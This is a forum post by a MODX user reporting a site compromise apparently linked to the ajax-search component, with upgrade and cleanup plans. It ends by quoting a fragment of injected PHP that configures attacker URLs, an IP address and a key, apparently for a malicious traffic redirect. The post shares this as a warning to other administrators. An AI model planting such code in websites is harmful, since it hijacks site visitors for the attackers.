That is terrible news.
Just after I read your post, modness, a friend called me saying that her hosting found it on her site and she should change all her passwords, including FTP. I found all of the tell-tale signs, that snippet.ditto2.php. I am going to upgrade her to 1.0.14 as soon as I get a chance.
After spending a lot of time upgrading a lot of sites to 1.0.14, I am going back through it all to make sure that I also delete all traces of ajax-search.
I hope that the vulnerability is limited to ajax-search.
If it is still happening in 1.0.14, I think it should be considered to NOT have it as a default in the vanilla install of MODX.
Here was a piece of code I found in one of the files made, just when I am getting told that the Russians have millions of people's passwords:
<?$tds="http://spoilt.ptds2.ru/TDS.post.php";$tdsip="194.28.70.132";$lin="http://g0od.ru/uz/index.php";$esdid="viagh";$key="bjijtyuumyummktyt865ue56yg56kmyjnkj67ti";?><?//BREACK//?>